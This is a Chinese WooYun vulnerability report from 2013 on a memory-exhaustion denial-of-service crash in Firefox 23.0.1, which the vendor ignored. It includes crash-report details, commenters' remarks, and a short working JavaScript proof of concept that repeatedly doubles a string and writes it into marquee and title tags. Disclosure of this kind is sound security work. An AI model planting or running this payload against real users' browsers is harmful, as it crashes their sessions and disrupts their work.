当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-036684

漏洞标题:Firefox 23.0.1处理标签内存溢出拒绝服务漏洞

相关厂商:火狐浏览器

漏洞作者: blast

提交时间:2013-09-10 17:05

修复时间:2013-12-06 17:06

公开时间:2013-12-06 17:06

漏洞类型:拒绝服务

危害等级:低

自评Rank:4

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-09-10: 细节已通知厂商并且等待厂商处理中
2013-09-15: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放
2013-11-09: 细节向核心白帽子及相关领域专家公开
2013-11-19: 细节向普通白帽子公开
2013-11-29: 细节向实习白帽子公开
2013-12-06: 细节向公众公开

简要描述:

坑爹的是启动后恢复会话about:sessionretore那儿一碰又卡死了……
D2D? D2D+ DWrite? DWrite+ D3D10 Layers? D3D10 Layers+ xpcom_runtime_abort(###!!! ABORT: OOM: file e:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\xpcom\string\src\nsTSubstring.cpp, line 533)
Debug String:
(JavaScript Error: "allocation size overflow", Line 5)

详细说明:

<script>
function A(){
var buffer = '\xFF';
for(i=0;i<26;i++) //<==崩不掉稍微改大点也可以,我这儿21左右就能崩溃了
{
buffer+=buffer+'\xFF'+'\xFC';
document.write('<marquee><title>'+buffer+buffer);
}
}
A();
</script>
我猜是渲染的那几次GlobalAlloc弄的?

漏洞证明:

挂之前的(19次循环),这时候基本已经快跑到外面来了:

f1.png


f3.png


再开会话

f2.png


AdapterDeviceID: 0x0847
AdapterVendorID: 0x10de
Add-ons: %7B9c51bd27-6ed8-4000-a2bf-36cb95c0c947%7D:11.0.1,fiddlerhook%40fiddler2.com:2.4.4.5,layoutPlan%40mozillaonline.com:1.0.2,%7Bea2b95c2-9be8-48ed-bdd1-5fcd2ad0ff99%7D:0.3.8.2,tabimprovelite%40mozillaonline.com:1.7.23.1,firegestures%40xuldev.org:1.7.10,coba%40mozilla.com.cn:1.0.15,cpmanager%40mozillaonline.com:1.0.4,%7B972ce4c6-7e08-4474-a285-3208198ce6fd%7D:23.0.1,jid1-2B1RkgHEZ0DcWA%40jetpack:0.2.1,firebug%40software.joehewitt.com:1.12.1
AvailablePageFile: 2052677632
AvailablePhysicalMemory: 711258112
AvailableVirtualMemory: 1816576000
BuildID: 20130814063812
CrashTime: 1378803057
EMCheckCompatibility: true
InstallTime: 1376813623
Notes: AdapterVendorID: 0x10de, AdapterDeviceID: 0x0847, AdapterSubsysID: 3665103c, AdapterDriverVersion: 9.18.13.1422
D2D? D2D+ DWrite? DWrite+ D3D10 Layers? D3D10 Layers+
OOMAllocationSize: 402653208
ProductID: {ec8030f7-c20a-464f-9b0e-13a3a9e97384}
ProductName: Firefox
ReleaseChannel: release
SecondsSinceLastCrash: 365
StartupTime: 1378803051
SystemMemoryUsePercentage: 82
Theme: classic/1.0
Throttleable: 1
TotalVirtualMemory: 4294836224
URL: about:blank
Vendor: Mozilla
Version: 23.0.1
Winsock_LSP: MSAFD Tcpip [TCP/IP] : 2 : 1 : %SystemRoot%\system32\mswsock.dll
MSAFD Tcpip [UDP/IP] : 2 : 2 :
MSAFD Tcpip [RAW/IP] : 2 : 3 : %SystemRoot%\system32\mswsock.dll
MSAFD Tcpip [TCP/IPv6] : 2 : 1 :
MSAFD Tcpip [UDP/IPv6] : 2 : 2 : %SystemRoot%\system32\mswsock.dll
MSAFD Tcpip [RAW/IPv6] : 2 : 3 :
RSVP TCPv6 服务提供商 : 2 : 1 : %SystemRoot%\system32\mswsock.dll
RSVP TCP 服务提供商 : 2 : 1 :
RSVP UDPv6 服务提供商 : 2 : 2 : %SystemRoot%\system32\mswsock.dll
RSVP UDP 服务提供商 : 2 : 2 :
VMCI sockets DGRAM : 0 : 2 : %windir%\system32\vsocklib.dll
VMCI sockets STREAM : 0 : 1 :
此报告同时包含了应用程序崩溃时状态的技术信息。

修复方案:

这个…看你们的了…

版权声明:转载请注明来源 blast@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2013-12-06 17:06

厂商回复:

最新状态:

暂无


漏洞评价:

评论

  1. 2013-09-10 17:44 | Master ( 路人 | Rank:29 漏洞数:10 )

    10w$

  2. 2013-09-10 18:17 | blast ( 普通白帽子 | Rank:348 漏洞数:57 | 五仁委员会)

    @Master 额 还木有到拿这奖金的严重程度 貌似只是单单因为火狐没计算好内存分配……40个标签居然把内存分配完了 然后就崩溃了-。-

  3. 2013-09-11 09:27 | blast ( 普通白帽子 | Rank:348 漏洞数:57 | 五仁委员会)

    [误导向]用第六感看了下 貌似是前面分配的内存会在最后统一释放 但是转为格式化后的数据的时候占用空间太大 导致最后几次分配失败 然后报错触发了BugReport

  4. 2013-12-06 17:17 | 小震 ( 路人 | Rank:8 漏洞数:3 | ~)

    我操= =我以为这类开源软件都很完美的说。。

  5. 2014-03-11 07:26 | 杀戮 ( 普通白帽子 | Rank:141 漏洞数:19 | 我,是来打酱油的。)

    @blast 火狐崩溃的漏洞是不给奖金的